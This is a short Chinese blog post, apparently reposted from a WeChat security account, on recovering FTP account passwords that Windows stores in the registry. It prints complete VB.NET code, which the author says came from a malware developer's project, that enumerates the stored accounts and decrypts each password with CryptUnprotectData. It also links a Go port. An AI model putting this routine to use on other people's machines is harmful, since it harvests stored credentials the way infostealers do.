某年某月某日,有一个需求,windows注册表ftp账号密码获取,网上一搜,确实没搜到... 搜到了一些古老的还原gui工具,下载安装了用不了(被骗)///
后来在github搜对应注册表位置的涉及代码,还真有人写过,一看项目是搞恶意软件的哥.很好很awesome
Dim ftpAccounts As Microsoft.Win32.RegistryKey = Microsoft.Win32.Registry.CurrentUser.OpenSubKey("SoftwareMicrosoftFTPAccounts")
For Each account As String In ftpAccounts.GetSubKeyNames()
Dim accountKey As Microsoft.Win32.RegistryKey = ftpAccounts.OpenSubKey(account)
For Each user As String In accountKey.GetSubKeyNames()
Dim userKey As Microsoft.Win32.RegistryKey = accountKey.OpenSubKey(user)
Dim pass() As Byte = CType(userKey.GetValue("Password"), Byte())
Dim dwEntropy(3) As Byte
For j As Integer = 0 To account.Length - 1
Dim c As Byte = CByte(AscW(account(j)) And &H1F)
dwEntropy(j And 3) = dwEntropy(j And 3) + c
Next
dataIn.cbData = pass.Length
dataIn.pbData = Marshal.AllocHGlobal(pass.Length).ToInt32()
Marshal.Copy(pass, 0, New IntPtr(dataIn.pbData), pass.Length)
dataOut.cbData = 0
dataOut.pbData = 0
Dim gc As GCHandle = GCHandle.Alloc(dwEntropy, GCHandleType.Pinned)
Entropy.pbData = gc.AddrOfPinnedObject().ToInt32()
Entropy.cbData = 4
CryptUnprotectData(dataIn, 0, Entropy, 0, 0, 0, dataOut)
gc.Free()
OL += "|URL| " & String.Format("ftp://{0}@{1}/", account, user) & vbNewLine & "|USR| " & user & vbNewLine & "|PWD| " & Marshal.PtrToStringUni(New IntPtr(dataOut.pbData)) & vbNewLine
LocalFree(dataOut.pbData)
Next
Next
VB代码搞下来感谢zk帮忙调试,大概用go写了一板获取ftp账号密码的,放github上了,帮助忘了账号密码的家人们。
https://github.com/Zhu013/registry_ftp_password_get
对了密码得保存才有
原文始发于微信公众号(FXDSecurity):windows注册表ftp账号密码获取
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论